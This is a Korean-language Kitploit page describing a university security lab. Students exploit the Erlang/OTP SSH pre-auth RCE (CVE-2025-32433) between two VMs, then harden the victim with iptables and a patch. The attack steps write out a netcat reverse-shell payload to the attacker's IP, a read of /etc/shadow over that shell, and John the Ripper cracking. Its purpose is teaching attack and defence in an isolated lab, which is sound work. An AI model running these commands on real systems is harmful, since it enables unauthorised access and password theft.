Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — 이 프로젝트는 두 대의 가상 머신을 사용하여 실제 공격 및 방어 시나리오를 시뮬레이션합니다. Erlang/OTP SSH 서버의 중요한 사전 인증 RCE 취약점(CVE-2025-32433)을 악용하고, 추출된 비밀번호 해시를 크랙한 후, 방화벽 규칙과 패치를 통해 피해 머신을 강화하게 됩니다. | Kitploit
도구/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
Password CrackingVulnerability AnalysisExploitationNetwork SecurityCTFPenetration TestingLearning & EducationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

이 프로젝트는 두 대의 가상 머신을 사용하여 실제 공격 및 방어 시나리오를 시뮬레이션합니다. Erlang/OTP SSH 서버의 중요한 사전 인증 RCE 취약점(CVE-2025-32433)을 악용하고, 추출된 비밀번호 해시를 크랙한 후, 방화벽 규칙과 패치를 통해 피해 머신을 강화하게 됩니다.

저장소 보기
52개월 전아직 검토되지 않음

정보 보안 기초 — 2026년 봄 프로젝트

총점: 20 | 마감일: 지연 제출 불가

개요

이 프로젝트는 두 대의 가상 머신을 대상으로 한 실제 공격 및 방어 시나리오를 시뮬레이션합니다. Erlang/OTP SSH 서버의 중요한 사전 인증 RCE 취약점(CVE-2025-32433)을 악용하고, 추출된 암호 해시를 크래킹한 후 방화벽 규칙과 패치를 통해 피해 시스템을 강화합니다.

역할OS
공격자Kali Linux
피해자Ubuntu/Debian (Erlang/OTP SSH v27.3.2)

파일

파일설명
Debian-1.ova사전 구축된 피해자 VM 이미지 — 별도 다운로드 필요, 자료 참조 (GitHub에 올리기엔 너무 큼)
Project Spring 2026 - Google Docs.pdf

자료

  • 피해자 VM (Debian-1.ova): 다운로드 링크 — GitHub에 호스팅하기엔 너무 큼(~3GB). 아래 설명에 따라 별도 다운로드하여 VirtualBox/VMware로 가져오십시오.
  • 단어 목록 (rockyou_txt.txt): 이 저장소에 포함되어 있으며, 2부의 암호 크래킹 단계에서 사용됩니다.

설정

  1. VM 가져오기 — Debian-1.ova와 Kali Linux VM을 VirtualBox/VMware로 로드합니다.
  2. 네트워크 — 두 VM을 Host-Only 어댑터로 설정하여 개인 통신이 가능하도록 합니다.
  3. 피해자 IP — 피해자 VM을 부팅하고 ifconfig를 실행하여 IP를 확인합니다(일반적으로 192.168.56.0/24 대역).

1부 — 취약한 SSH 서버 배포 및 익스플로잇 (10점)

정찰

root@kitploit:~
nmap -p 2222 -sV -A <victim-IP>

열린 포트, 서비스 버전 및 Erlang 시그니처를 문서화합니다.

CVE-2025-32433 익스플로잇 (사전 인증 RCE)

일시적으로 Kali를 NAT로 전환하여 저장소를 클론한 후, 다시 Host-Only로 전환합니다.

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

스크립트 편집 — HOST = "<victim-IP>"를 설정하고 페이로드 업데이트:

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

터미널 1 (Kali) — 리스너 시작:

root@kitploit:~
nc -lvnp 4444

터미널 2 (Kali) — 익스플로잇 실행:

root@kitploit:~
python3 CVE-2025-32433.py

리버스 셸에서 whoami와 hostname을 실행하여 액세스를 확인합니다.


2부 — 사후 익스플로잇 및 암호 크래킹 (5점)

해시 추출 및 크래킹

root@kitploit:~
# 피해자에서 (리버스 셸을 통해)
cat /etc/shadow | grep testuser > hash.txt

# Kali에서
john --wordlist=rockyou_txt.txt hash.txt

해시 형식(예: $6$ = SHA-512), 소요 시간, 복구된 평문 암호를 문서화합니다.

플래그 찾기

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

3부 — 통제 및 수정 (5점)

공격 벡터 차단 (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

Kali에서 Nmap 스캔과 익스플로잇을 다시 실행 — 포트 2222가 이제 "Filtered" 상태이며 익스플로잇이 실패하는 것을 문서화합니다.

취약점 패치

Erlang/OTP를 v27.3.3 이상으로 업그레이드하는 단계를 문서화합니다. 이 버전에는 CVE-2025-32433에 대한 수정 사항이 포함되어 있습니다.


산출물

  • 스캔, 익스플로잇 실행, 리버스 셸(whoami/hostname), 플래그 캡처에 대한 스크린샷이 포함된 전체 보고서
  • 방화벽 전후 문서화(포트 상태 변경을 보여주는 Nmap 결과)
  • 사전 인증 RCE가 사후 인증 익스플로잇보다 훨씬 위험한 이유를 설명하는 서면 성찰

CVE 참조

CVE-2025-32433 — Erlang/OTP SSH 서버의 중요한 사전 인증 원격 코드 실행. 자격 증명 교환 전에 변조된 SSH 패킷을 전송하여 악용 가능하며, 인증되지 않은 공격자에게 완전한 셸 액세스를 제공합니다.

도구 다운로드
전체 프로젝트 지침 및 산출물 포함
rockyou_txt.txtJohn the Ripper와 함께 사용하여 추출된 암호 해시를 크래킹하는 단어 목록